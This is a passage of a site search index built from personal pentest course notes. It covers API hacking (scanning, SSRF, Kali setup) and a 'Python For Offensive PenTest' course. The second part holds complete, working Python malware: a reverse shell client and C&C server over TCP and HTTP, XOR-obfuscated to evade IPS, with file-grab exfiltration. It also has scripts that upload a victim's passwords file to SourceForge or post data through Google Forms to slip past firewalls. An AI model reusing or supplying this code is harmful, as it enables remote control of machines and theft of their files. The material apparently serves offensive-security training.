                                  ","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api10","title":"Writeup: API10","text":"","tags":["api"]},{"location":"hackingapis/scanning-apis/","title":"Scanning APIs","text":"General index of the course
                                  • Setting up the environment
                                  • Api Reconnaissance.
                                  • Endpoint Analysis.
                                  • Scanning APIS.
                                  • API Authorization Attacks.
                                  • Exploiting API Authorization.
                                  • Testing for Improper Assets Management.
                                  • Mass Assignment.
                                  • Server side Request Forgery.
                                  • Injection Attacks.
                                  • Evasion and Combining techniques.
                                  • Setting up the labs + Writeups

                                  Once you have discovered an API and used it as it was intended, you can proceed to perform a baseline vulnerability scan. Most of these scans return false-negative results (because they are web-oriented) but they are helpful in structuring next steps.

                                  Basic scans you can run:

                                  ","tags":["api"]},{"location":"hackingapis/scanning-apis/#nikto","title":"nikto","text":"

                                  You will get some results related to headers such as:

                                  • The anti-clickjacking X-Frame-Options header is not present.
                                  • The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
                                  • The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

                                  Run:

                                  nikto -h http://localhost:8888\n
                                  ","tags":["api"]},{"location":"hackingapis/scanning-apis/#owasp-zap","title":"OWASP zap","text":"

                                  To launch it, run:

                                  zaproxy\n

                                  You can do several things:

                                  • Run an automatic attack.
                                  • Import your spec.yml file and run an automatic attack.
                                  • Run a manual attack.

                                  The manual explore option will allow you to perform authenticated scanning. Set the URL to your target, make sure the HUD is enabled, and choose \"Launch Browser\".

                                  ","tags":["api"]},{"location":"hackingapis/scanning-apis/#how-to-run-a-manual-attack","title":"How to run a manual attack","text":"

                                  Select \"Continue to your target\". On the right-hand side of the HUD, you can set the Attack Mode to On. This will begin scanning and performing authenticated testing of the target. Now you perform all the actions (sign up a new user, log in into the account, modify you avatar, post a comment...).

                                  After that, OWASP Zap allows you to narrow the results to your target. How? In the Sites module, right click on your site and select \"Include in context\". After that, click on the icon shaped as a \"target\" to filter out sites by context.

                                  With the results, start your analysis and remove false-negative vulnerabilities.

                                  ","tags":["api"]},{"location":"hackingapis/server-side-request-forgery-ssrf/","title":"SSRF attack - Server side Request Forgery","text":"General index of the course
                                  • Setting up the environment
                                  • Api Reconnaissance.
                                  • Endpoint Analysis.
                                  • Scanning APIS.
                                  • API Authorization Attacks.
                                  • Exploiting API Authorization.
                                  • Testing for Improper Assets Management.
                                  • Mass Assignment.
                                  • Server side Request Forgery.
                                  • Injection Attacks.
                                  • Evasion and Combining techniques.
                                  • Setting up the labs + Writeups

                                  This vulnerability allows an attacker to supply URLs that expose private data, scan the target's internal network, or compromise the target through remote code execution.

                                  ","tags":["api"]},{"location":"hackingapis/server-side-request-forgery-ssrf/#identify-endpoints","title":"Identify endpoints","text":"

                                  Read your collection throughfully and search for requests that:

                                  • Include full URLs in the POST body or parameters
                                  • Include URL paths (or partial URLs)\u00a0in the POST body or parameters
                                  • Headers that include URLs like Referer
                                  • Allows for user input that may result in a server retrieving resources
                                  ","tags":["api"]},{"location":"hackingapis/server-side-request-forgery-ssrf/#ssrf-types","title":"SSRF types","text":"","tags":["api"]},{"location":"hackingapis/server-side-request-forgery-ssrf/#in-band-ssrf","title":"In-Band SSRF","text":"

                                  A URL is specified as an attack. The request is sent and the content of your supplied URL is displayed back to you in a response.

                                  A possible endpoint:

                                  {\n    \"inventory\":\"http://store.com/api/v3/inventory/item/12345\"\n}\n

                                  SSRF code:

                                  {\n    \"inventory\":\"http://maliciousserver.com\"\n}\n
                                  ","tags":["api"]},{"location":"hackingapis/server-side-request-forgery-ssrf/#blind-ssrf","title":"Blind SSRF","text":"

                                  It's similar to In-Band attack. In this case, the response is returned and we do not have any indication that the server is vulnerable:

                                  HTTP/1.1 200 OK  \nheaders...  \n{}\n

                                  But, there is a way to test it. Burp Suite Pro has a great tool called Burp Suite Collaborator. Collaborator can be leveraged to set up a web server that will provide us with the details of any requests that are made to our random URL.

                                  ","tags":["api"]},{"location":"hackingapis/server-side-request-forgery-ssrf/#tools-to-test-blind-ssrf","title":"Tools to test Blind SSRF","text":"

                                  Free:

                                  • https://webhook.site
                                  • http://pingb.in/
                                  • https://requestbin.com/
                                  • https://canarytokens.org/

                                  Paid:

                                  • Burp Collaborator.
                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/","title":"Setting up the environment","text":"General index of the course
                                  • Setting up the environment
                                  • Api Reconnaissance.
                                  • Endpoint Analysis.
                                  • Scanning APIS.
                                  • API Authorization Attacks.
                                  • Exploiting API Authorization.
                                  • Testing for Improper Assets Management.
                                  • Mass Assignment.
                                  • Server side Request Forgery.
                                  • Injection Attacks.
                                  • Evasion and Combining techniques.
                                  • Setting up the labs + Writeups

                                  For this course, I'll use a Kali machine installed on VirtualBox. I downloaded last .ova version, 2022-3.

                                  After that, follow these steps:

                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#1-install-a-kali-ova-on-virtualbox","title":"1. Install a kali ova on VirtualBox","text":"

                                  For this course I've downloaded a Kali .ova machine. I will be using VirtualBox and I will modify these elements in the ova installation:

                                  • 4GB RAM
                                  • Bridge mode Interface
                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#2-update-our-system","title":"2. Update our system","text":"
                                  sudo apt update -y\nsudo apt upgrade -y\nsudo apt-dist upgrade -y\n

                                  Also, update credentials:

                                  sudo passwd kali\u00a0 \u00a0 (enter in a new more complex password)\nsudo useradd -m hapihacker\nsudo usermod -a -G sudo hapihacker\nsudo chsh -s /bin/zsh hapihacker\n
                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#3-install-burp-suite-and-make-sure-that-is-up-to-date","title":"3. Install Burp Suite and make sure that is up-to-date.","text":"
                                  sudo apt-get install burpsuite -y\n
                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#4-adding-extension-authorize-extension-to-burpsuite-this-will-require-to-have-jython-installed","title":"4. Adding extension Authorize extension to BurpSuite: this will require to have Jython installed.","text":"
                                  1. Download jython from: https://www.jython.org/download.html and add the .jar file to the Extender Options.
                                  2. Under the Extender BApp Store search for Autorize and install the extension.
                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#5-install-foxy-proxy-in-firefox-to-proxy-the-traffic-to-burpsuite-and-postman-once-intalled-well-set-up-manually-two-proxies","title":"5. Install Foxy-proxy in Firefox to proxy the traffic to BurpSuite and Postman. Once intalled, we'll set up manually two proxies","text":"
                                  1. Postman - 127.0.0.1 - 5555
                                  2. BurpSuite - 127.0.0.1 - 8080.

                                  Download BurpSuite certificate and have it installed in Firefox.

                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#6-mitmweb-certificate-setup","title":"6. MITMweb certificate setup","text":"
                                  1. Install mitmweb from the terminal:
                                  mitmweb\n

                                  We need to make sure that Burpsuite is stopped, since mitmweb is also going to use port 8080.

                                  1. Activate FoxyProxy in Firefox to send traffic \u00a0to the BurpSuite proxy (8080).

                                  2. Download mitmproxy-ca-cert.pem from mitm.it (in Firefox) and have it installed in Firefox.

                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#7-install-postman","title":"7. Install Postman","text":"
                                  sudo wget https://dl.pstmn.io/download/latest/linux64 -O postman-linux-x64.tar.gz &&\u00a0sudo tar -xvzf postman-linux-x64.tar.gz -C /opt &&\u00a0sudo ln -s /opt/Postman/Postman /usr/bin/postman\n
                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#8-install-mitmproxy2swagger","title":"8. Install mitmproxy2swagger","text":"
                                  cd /opt\nsudo pip3 install mitmproxy2swagger\n
                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#9-install-git","title":"9. Install git","text":"
                                  cd /opt\nsudo apt-get install git\n
                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#10-install-docker","title":"10. Install docker","text":"
                                  cd /opt\nsudo apt-get install docker.io docker-compose\n
                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#11-install-go","title":"11. Install Go","text":"
                                  cd /opt\nsudo\u00a0apt install golang-go\n
                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#12-install-json-web-token-toolkit-v2","title":"12. Install JSON Web Token Toolkit v2","text":"
                                  cd /opt\nsudo git clone\u00a0https://github.com/ticarpi/jwt_tool\ncd jwt_tool\npython3 -m pip install termcolor cprint pycryptodomex requests\n\n# Optional: Make an alias for jwt_tool.py**\nsudo chmod +x jwt_tool.py\nsudo ln -s /opt/jwt_tool/jwt_tool.py /usr/bin/jwt_tool\n
                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#13-install-kiterunner","title":"13. Install Kiterunner","text":"
                                  sudo git clone https://github.com/assetnote/kiterunner.git\ncd kiterunner\nsudo make build\nsudo ln -s /opt/kiterunner/dist/kr /usr/bin/kr\n
                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#14-install-arjun","title":"14. Install Arjun","text":"

                                  More about arjun.

                                  sudo git clone\u00a0https://github.com/s0md3v/Arjun.git\n
                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#15-install-owasp-zap","title":"15. Install OWASP ZAP","text":"
                                  sudo apt install zaproxy\n

                                  Run ZAP and open the \"Manage Add-ons\" option and make sure that the add-on \"OpenAPI Support\" is marked to be updated.

                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#16-have-these-useful-wordlist-api-oriented","title":"16. Have these useful wordlist API oriented","text":"
                                  # SecLists https://github.com/danielmiessler/SecLists\nsudo\u00a0wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \\  \n&& sudo unzip SecList.zip \\  \n&& sudo rm -f SecList.zip\n\n# Hacking-APIs https://github.com/hAPI-hacker/Hacking-APIs\nsudo\u00a0wget -c\u00a0https://github.com/hAPI-hacker/Hacking-APIs/archive/refs/heads/main.zip\u00a0-O HackingAPIs.zip \\  \n&& sudo unzip HackingAPIs.zip \\  \n&& sudo rm -f HackingAPIs.zip\n
                                  ","tags":["api"]},{"location":"python/bypassing-ips-with-handmade-xor-encryption/","title":"Bypassing IPS with handmade XOR Encryption","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
                                    • Tunning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
                                    • Using a Dynamic DNS instead of your bared attacker public ip.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
                                    • Hickjack the Internet Explorer process to bypass an host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
                                  • Malware and crytography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
                                  • Password Hickjacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.

                                  The idea is to encrypt our traffic to avoid network analyzers or intrusion prevention sensors. SSL or SSH is not recommended here since Next Generation Firewalls have the ability to decrypt them and pass it as plain text to the IPS, where it will be recognized.

                                  • Create a secret key of 1Kb that matches the size of the socket, to make a XOR operation to encrypt the message
                                  # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\n# The random and string libraries are used to generate a random string with flexible criteria\nimport string\nimport random\n\n\n# Random Key Generator\nkey = ''.join(random.choice(string.ascii_lowercase + string.ascii_uppercase + string.digits + '^!\\$%&/()=?{[]}+~#-_.:,;<>|\\\\') for _ in range(0, 1024))\n\n\nprint(key)\n\nprint (\"\\n\" + \"Key length = \" + str(len(key)))\n\nmessage = 'ipconfig'\nprint(\"Msg: \" + message + '\\n')\n\n\n# here i defined a dedicated function called str_xor, we will pass two values to this fucntion, the first value is the message(s1) that we want to encrypt or decrypt, and the second paramter is the xor key(s2). We were able to bind the encryption and the decryption phases in one function because the xor operation is exactly the same when we encrypt or decrpyt, the only difference is that when we encrypt we pass the message in clear text and when we want to decrypt we pass the encrypted message\n\n\ndef str_xor(s1, s2):\n    return \"\".join([chr(ord(c1) ^ ord(c2)) for (c1, c2) in zip(s1,s2)])\n\n\n# first we split the message and the xor key to a list of character pair in tuples format >>  for (c1,c2) in zip(s1,s2)\n\n# next we will go through each tuple, and converting them to integer using (ord) function, once they converted into integers we can now perform exclusive OR on them  >>  ord(c1) ^ ord(c2)\n\n# then convert the result back to ASCII using (chr) function  >>  chr(ord(c1) ^ ord(c2))\n# last step we will merge the resulting array of characters as a sequqnece string using >>>  \"\".join function \n\nenc = str_xor(message, key)\n\nprint(\"Encrypted message is \" + \"\\n\" + enc + \"\\n\")\n\ndec = str_xor(enc, key)\nprint(\"Decrypted message is \" + \"\\n\" + dec + \"\\n\")\n

                                  To integrate XOR encryption into this client side Python script, you can modify the script to encrypt and decrypt the communication between the client and the server using the XOR encryption algorithm.

                                  Here is an example of how to modify the script to incorporate XOR encryption:

                                  import string\nimport random\nimport requests\nimport os\nimport subprocess\nimport time\n\n# Random Key Generator\nkey = ''.join(random.choice(string.ascii_lowercase + string.ascii_uppercase + string.digits + '^!\\$%&/()=?{[]}+~#-_.:,;<>|\\\\') for _ in range(0, 1024))\n\n# Define XOR function\ndef str_xor(s1, s2):\n    return \"\".join([chr(ord(c1) ^ ord(c2)) for (c1, c2) in zip(s1,s2)])\n\nwhile True:\n    # Send GET request to C&C server to get command\n    req = requests.get('http://192.168.0.152:8080')\n    command = req.text\n\n    # If command is to terminate, break out of loop\n    if 'terminate' in command:\n        break\n\n    # If command is to grab a file and send it to the C&C server\n    elif 'grab' in command:\n        grab, path = command.split(\"*\")\n        if os.path.exists(path):\n            url = \"http://192.168.0.152:8080/store\"\n            filer = {'file': open(path, 'rb')}\n            r = requests.post(url, files=filer)\n        else:\n            post_response = requests.post(url='http://192.168.0.152:8080', data='[-] Not able to find the file!'.encode())\n\n    # If command is to search for files with a specific extension\n    elif 'search' in command:\n        # Split command into path and file extension\n        command = command[7:] #cut off the the first 7 character ,, output would be  C:\\\\*.pdf\n        path, ext = command.split('*')\n        lists = '' # here we define a string where we will append our result on it\n\n        # Walk through directories and search for files with specified extension\n        for dirpath, dirname, files in os.walk(path):\n            for file in files:\n                if file.endswith(ext):\n                    lists = lists + '\\n' + os.path.join(dirpath, file)\n        requests.post(url='http://192.168.0.152:8080', data=lists)\n\n    # If command is a shell command, execute it and send output to the C&C server\n    else:\n        # Encrypt command with XOR key\n        enc = str_xor(command, key)\n\n        # Execute encrypted command and capture stdout and stderr\n        CMD = subprocess.Popen(enc, shell=True,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        post_response = requests.post(url='http://192.168.0.152:8080', data=str_xor(CMD.stdout.read(), key))\n        post_response = requests.post(url='http://192.168.0.152:8080', data=str_xor(CMD.stderr.read(), key))\n\n    time.sleep(3)\n
                                  ","tags":["python","python pentesting","scripting","ips","xor encryption"]},{"location":"python/bypassing-next-generation-firewalls/","title":"Bypassing Next Generation Firewalls","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
                                    • Tunning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
                                    • Using a Dynamic DNS instead of your bared attacker public ip.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
                                    • Hickjack the Internet Explorer process to bypass an host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
                                  • Malware and crytography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
                                  • Password Hickjacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.

                                  Corporate firewall (Next Generation Firewalls) can block traffic based on the reputation of the target IP/url. This means that once we achieve to execute the malicious client side script on the victim's machine, this next generation firewall might block/defer the connection if the reputation or the rank of the target URL/IP belongs to a pool of resources supplied by the vendor and it's categorized as low.

                                  To overcome this filter, modern malware is using trusted targets.

                                  ","tags":["python","python pentesting","scripting","bypassing techniques","firewall","bypassing firewall","next generation firewalls"]},{"location":"python/bypassing-next-generation-firewalls/#using-source-forge-for-data-exfiltration","title":"Using Source Forge for data exfiltration","text":"

                                  1. Signup in Source Forge

                                  You will get credentials for configuring your SFTP agent in step 3.

                                  2. Install filezilla. It will work as our SFTP agent:

                                  sudo apt-get install filezilla\n

                                  3. Configure filezilla and connect.

                                  Host: web.sourceforge.net\nusername: usernameinSourceForge\npassword: passwordinSourceForge\nport: 22\n

                                  4. Install these two python libraries on the victim's machine: paramiko and scp.

                                  pip install paramiko\npip install scp\n

                                  5. Run the script on the victim's machine:

                                  '''\nCaution\n--------\nUsing this script for any malicious purpose is prohibited and against the law. Please read SourceForge terms and conditions carefully. \nUse it on your own risk. \n'''\n\n# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport paramiko\nimport scp\n\n# File Management on SourceForge \n# [+] https://sourceforge.net/p/forge/documentation/File%20Management/\n\n\nssh_client = paramiko.SSHClient() # creating an ssh_client instance using paramiko sshclient class\n\nssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\nssh_client.connect(\"web.sourceforge.net\", username=\"myusernameatSourceForge\", password=\"PASSWORD HERE\") #Authenticate ourselves to the sourceforge. Server, user and password from step 1\nprint (\"[+] Authenticating against web.sourceforge.net\")\n\nscp = scp.SCPClient(ssh_client.get_transport()) #after a sucessful authentication the ssh session id will be passed into SCPClient function\n\nscp.put(\"C:/Users/Alex/Desktop/passwords.txt\") # upload a file, for instance password.txt\nprint (\"[+} File is uploaded\")\n\nscp.close()\n\nprint(\"[+] Closing the socket\")\n
                                  ","tags":["python","python pentesting","scripting","bypassing techniques","firewall","bypassing firewall","next generation firewalls"]},{"location":"python/bypassing-next-generation-firewalls/#using-google-forms-for-submitting-output","title":"Using Google Forms for submitting output","text":"

                                  1. Create a Google Form with a quick test and copy the link of the survey.

                                  2. Copy the name of the form from the source code of the google form.

                                  3. Paste URL of the survey + name of the form in the script:

                                  '''\nCaution\n--------\nUsing this script for any malicious purpose is prohibited and against the law. Please read Google terms and conditions carefully. \nUse it on your own risk. \n'''\n\n# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\n\nimport requests\n\nurl = 'https://docs.google.com/forms/d/1Ndjnm5YViqIYXyIuoTHsCqW_YfGa-vaaKEahY2cc5cs/formResponse'\n\nform_data = {'entry.1301128713':'Lets see how we can use this, in the next exercise'}\n\nr = requests.post(url, data=form_data)\n\n# Submitting form-encoded data in requests:-\n# http://docs.python-requests.org/en/latest/user/quickstart/#more-complicated-post-requests\n
                                  ","tags":["python","python pentesting","scripting","bypassing techniques","firewall","bypassing firewall","next generation firewalls"]},{"location":"python/bypassing-next-generation-firewalls/#exercise","title":"Exercise","text":"
                                  Try to combine the above ideas (Google Form + Twitter + SourceForge) Into a single script and see if you can control your target without direct interaction.\n
                                  ","tags":["python","python pentesting","scripting","bypassing techniques","firewall","bypassing firewall","next generation firewalls"]},{"location":"python/coding-a-data-exfiltration-script-http-shell/","title":"Coding a data exfiltration script for a http shell","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
                                    • Tunning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
                                    • Using a Dynamic DNS instead of your bared attacker public ip.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
                                    • Hickjack the Internet Explorer process to bypass an host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
                                  • Malware and crytography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
                                  • Password Hickjacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-data-exfiltration-script-http-shell/#client-side","title":"Client side","text":"

                                  To be run on victim's computer.

                                  # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport requests\nimport os\nimport subprocess\nimport time\n\nwhile True:\n\n    req = requests.get('http://192.168.0.152:8080')\n    command = req.text\n    if 'terminate' in command:\n        break\n\n\n# Now similar to what we have done in our TCP reverse shell, we check if file exisit in the first place, if not then we \n# notify our attacker that we are unable to find the file, but if the file is there then we will :-\n# 1.Append /store in the URL\n# 2.Add a dictionary key called 'file'\n# 3.requests library use POST method called \"multipart/form-data\" when submitting files\n\n#All of the above points will be used on the server side to distinguish that this POST is for submitting a file NOT a usual command output. Please see the server script for more details on how we can use these points to get the file\n\n\n    elif 'grab' in command:\n        grab, path = command.split(\"*\")\n        if os.path.exists(path): # check if the file is there\n            url = \"http://192.168.0.152:8080/store\" # Appended /store in the URL\n            files = {'file': open(path, 'rb')} # Add a dictionary key called 'file' where the key value is the file itself\n            r = requests.post(url, files=files) # Send the file and behind the scenes, requests library use POST method called \"multipart/form-data\"\n        else:\n            post_response = requests.post(url='http://192.168.0.152:8080', data='[-] Not able to find the file!'.encode())\n    else:\n        CMD = subprocess.Popen(command, shell=True,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stdout.read())\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stderr.read())\n    time.sleep(3)\n
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-data-exfiltration-script-http-shell/#server-side","title":"Server side","text":"
                                  # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport http.server\nimport os, cgi\n\nHOST_NAME = '10.0.2.15'\nPORT_NUMBER = 8080\n\nclass MyHandler(http.server.BaseHTTPRequestHandler):\n\n    def do_GET(self):\n\n        command = input(\"Shell> \")\n        self.send_response(200)\n        self.send_header(\"Content-type\", \"text/html\")\n        self.end_headers()\n        self.wfile.write(command.encode())\n\n    def do_POST(self):\n\n        #Here we will use the points which we mentioned in the Client side, as a start if the \"/store\" was in the URL then this is a POST used for file transfer so we will parse the POST header, if its value was 'multipart/form-data' then we will pass the POST parameters to FieldStorage class, the \"fs\" object contains the returned values from FieldStorage in dictionary fashion.\n\n        if self.path == '/store':\n            try:\n                ctype, pdict = cgi.parse_header(self.headers.get('content-type'))\n                if ctype == 'multipart/form-data':\n                    fs = cgi.FieldStorage(fp=self.rfile, headers = self.headers, environ= {'REQUEST_METHOD': 'POST'})\n                else:\n                    print('[-]Unexpected POST request')\n                fs_up = fs['file'] # Remember, on the client side we submitted the file in dictionary fashion, and we used the key 'file'\n                with open('/home/kali/place_holder.txt', 'wb') as o: # create a file holder called 'placer_holder.txt' and write the received file into this 'place_holder.txt'. After the operation you need to rename this file to the original one, so the extention gets recognized. \n                    print('[+] Writing file ..')\n                    o.write(fs_up.file.read())\n                    self.send_response(200)\n                    self.end_headers()\n            except Exception as e:\n                print(e)\n            return\n        self.send_response(200)\n        self.end_headers()\n        length = int(self.headers['Content-length'])\n        postVar = self.rfile.read(length)\n        print(postVar.decode())\n\nif __name__ == '__main__':\n    server_class = http.server.HTTPServer\n    httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler)\n    try:\n        httpd.serve_forever()\n    except KeyboardInterrupt:\n        print ('[!] Server is terminated')\n        httpd.server_close()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-low-level-data-exfiltration-tcp/","title":"Coding a low level data exfiltration - TCP connection","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
                                    • Tunning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
                                    • Using a Dynamic DNS instead of your bared attacker public ip.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
                                    • Hickjack the Internet Explorer process to bypass an host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
                                  • Malware and crytography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
                                  • Password Hickjacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-low-level-data-exfiltration-tcp/#client","title":"Client","text":"

                                  To be run on victim's computer.

                                  # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\nimport socket\nimport subprocess\nimport os\n\n\n# In the transfer function, we first check if the file exists in the first place, if not we will notify the attacker\n# otherwise, we will create a loop where each time we iterate we will read 1 KB of the file and send it, since the\n# server has no idea about the end of the file we add a tag called 'DONE' to address this issue, finally we close the file\ndef transfer(s, path):\n    if os.path.exists(path):\n        f = open(path, 'rb')\n        packet = f.read(1024)\n        while len(packet) > 0:\n            s.send(packet)\n            packet = f.read(1024)\n        s.send('DONE'.encode())\n    else:\n        s.send('File not found'.encode())\ndef connecting():\n    s = socket.socket()\n    s.connect((\"10.0.2.15\", 8080))\n\n    while True:\n        command = s.recv(1024)\n\n        if 'terminate' in command.decode():\n            s.close()\n            break\n\n\n# if we received grab keyword from the attacker, then this is an indicator for file transfer operation, hence we will split the received commands into two parts, the second part which we intersted in contains the file path, so we will store it into a varaible called path and pass it to transfer function\n\n# Remember the Formula is  grab*<File Path>\n# Absolute path example:  grab*C:\\Users\\Hussam\\Desktop\\photo.jpeg\n        elif 'grab' in command.decode():\n            grab, path = command.decode().split(\"*\")\n            try:\n                transfer(s, path)\n            except:\n                pass\n        else:\n            CMD = subprocess.Popen(command.decode(), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n            s.send(CMD.stderr.read())\n            s.send(CMD.stdout.read())\ndef main():\n    connecting()\nmain()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-low-level-data-exfiltration-tcp/#server","title":"Server","text":"

                                  To be run on attacker's computer.

                                  # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\nimport os\nimport socket\n\ndef transfer(conn, command):\n    conn.send(command.encode())\n    grab, path = command.split(\"*\")\n    f = open('/home/kali/'+path, 'wb')\n    while True:\n        bits = conn.recv(2048)\n        if bits.endswith('DONE'.encode()):\n            f.write(bits[:-4]) # Write those last received bits without the word 'DONE' \n            f.close()\n            print ('[+] Transfer completed ')\n            break\n        if 'File not found'.encode() in bits:\n            print ('[-] Unable to find out the file')\n            break\n        f.write(bits)\ndef connecting():\n    s = socket.socket()\n    s.bind((\"10.0.2.15\", 8080))\n    s.listen(1)\n    print('[+] Listening for income TCP connection on port 8080')\n    conn, addr = s.accept()\n    print('[+]We got a connection from', addr)\n\n    while True:\n        command = input(\"Shell> \")\n        if 'terminate' in command:\n            conn.send('terminate'.encode())\n            break\n        elif 'grab' in command:\n            transfer(conn, command)\n        else:\n            conn.send(command.encode())\n            print(conn.recv(1024).decode())\ndef main():\n    connecting()\nmain()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-low-level-data-exfiltration-tcp/#using-pyinstaller","title":"Using pyinstaller","text":"

                                  See pyinstaller.

                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-reverse-shell-that-scans-ports/","title":"Coding a reverse shell that scans ports","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
